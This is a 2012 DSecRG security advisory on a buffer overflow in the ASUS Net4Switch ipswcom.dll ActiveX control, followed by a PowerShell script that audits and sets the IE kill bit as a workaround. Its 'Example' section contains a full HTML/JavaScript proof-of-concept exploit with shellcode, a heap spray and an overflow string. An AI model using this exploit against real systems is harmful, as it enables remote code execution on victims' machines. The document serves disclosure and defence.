

[DSECRG-12-017] ASUS Net4Switch ipswcom.dll ActiveX - buffer overflow vulnerability

ASUS Net4Switch contains an ActiveX component, ipswcom.dll, which is vulnerable to a buffer overflow attack.

Application: ASUS Net4Switch
Versions Affected: ASUS Net4Switch ipswcom.dll 1.0.0.1
Vendor URL: http://www.asus.com
Bugs: Buffer Overflow
Exploits: YES
Reported: 22.04.2010
Vendor response: none
Public Advisory: 17.02.2012
Author: Dmitriy Evdokimov from Digital Security Research Group [DSecRG]


Details
*******
An attacker can construct an HTML page that calls the vulnerable function "Alert" of the ipswcom.dll ActiveX control with a long parameter.


Tested on:
ASUS Net4Switch ipswcom.dll 1.0.0.1


Class CIPSWComItf
GUID: {1B9E86D8-7CAF-46C8-9938-569B21E17A8E}
Number of Interfaces: 1
Default Interface: IIPSWComItf
RegKey Safe for Script: True
RegKey Safe for Init: False
KillBitSet: False


Example
*******

<HTML>
<HEAD>
<TITLE>DSecRG: Asus exploit by EvdokimovDS</TITLE>
</HEAD>
<BODY>

<OBJECT id='vuln' classid='clsid:1B9E86D8-7CAF-46C8-9938-569B21E17A8E'></object>
<SCRIPT>

function Exploit()
{

//Shellcode exec notepad
var shell = unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%
u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61
%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud00
1%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3c
e3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf
475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u
588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%
ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850
%u8b31%u876f%ud5ff%ue0bb%u2a1d%u680a%u95a6%u9dbd%ud5ff%u063
c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u6ed5%u74
6f%u7065%u6461%u0000");

//Heap-spray
var bigbk=unescape("%u9090%u9090%u9090%u9090");
while(bigbk.length<0x40000) bigbk=bigbk+bigbk;
var mem=new Array();
for(i=0; i<400;i++) mem[i]=bigbk+shell;

//Buffer overflow
var bf=unescape("%u0d0d%u0d0d");
var buf="";
while (buf.length<8000) buf=buf+bf;

vuln.Alert(buf);
}

Exploit();
</SCRIPT>
</BODY>
</HTML>


Fix Information
***************
No fix is available.
Workaround: set the kill bit for the control's CLSID.
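
The kill-bit workaround as an added example (not part of the original advisory): a PowerShell script that reports whether the kill bit is set for the CLSID listed above and sets it in both registry views. It assumes an elevated 64-bit PowerShell session; the function names Get-KillBitState and Set-KillBit are hypothetical.

```powershell
# Added example: audit and set the Internet Explorer kill bit for the
# control named in this advisory. Function names are hypothetical.
$Clsid   = '{1B9E86D8-7CAF-46C8-9938-569B21E17A8E}'   # CIPSWComItf, from the advisory
$KillBit = 0x400                                      # kill bit in "Compatibility Flags"

# Native view plus the view read by 32-bit Internet Explorer on 64-bit Windows.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-Flags([string]$Key) {
    # Returns the current flags, or 0 when the key or value does not exist.
    if (-not (Test-Path $Key)) { return 0 }
    $prop = Get-ItemProperty -Path $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($prop) { return [int]$prop.'Compatibility Flags' }
    return 0
}

function Get-KillBitState {
    foreach ($root in $Roots) {
        if (-not (Test-Path $root)) { continue }      # view absent on 32-bit Windows
        $key   = Join-Path $root $Clsid
        $flags = Get-Flags $key
        [pscustomobject]@{
            Key        = $key
            Flags      = '0x{0:X8}' -f $flags
            KillBitSet = (($flags -band $KillBit) -ne 0)
        }
    }
}

function Set-KillBit {
    foreach ($root in $Roots) {
        if (-not (Test-Path $root)) { continue }
        $key = Join-Path $root $Clsid
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        # OR the bit in so any compatibility flags already present are kept.
        $new = (Get-Flags $key) -bor $KillBit
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $new -Type DWord
    }
}

Get-KillBitState | Format-Table -AutoSize   # state before the change
Set-KillBit                                 # needs administrative rights
Get-KillBitState | Format-Table -AutoSize   # KillBitSet should now be True
```

The kill bit stops Internet Explorer from instantiating the control; it does not remove or repair ipswcom.dll.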


References
**********
http://dsecrg.com/pages/vul/show.php?id=417


About DSecRG
*******
The main mission of DSecRG is to conduct research on business-critical systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The results of this work are then integrated into ERPScan Security Scanner. Being at the leading edge of ERP and SAP security, DSecRG research helps to improve the quality of ERPScan consulting services and protects you from the latest threats.
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com


About ERPScan
*******
ERPScan is an innovative company engaged in the research of ERP security. It develops products for ERP system security assessment. Apart from this, the company provides consulting services for secure configuration, development and implementation of ERP systems, and conducts comprehensive assessment and penetration testing of custom solutions.
Our flagship products are "ERPScan Security Scanner for SAP" and "ERPScan Online" service which can help customers to perform automated security assessments and compliance checks for SAP solutions.
Contact: info [at] erpscan [dot] com
http://www.erpscan.com
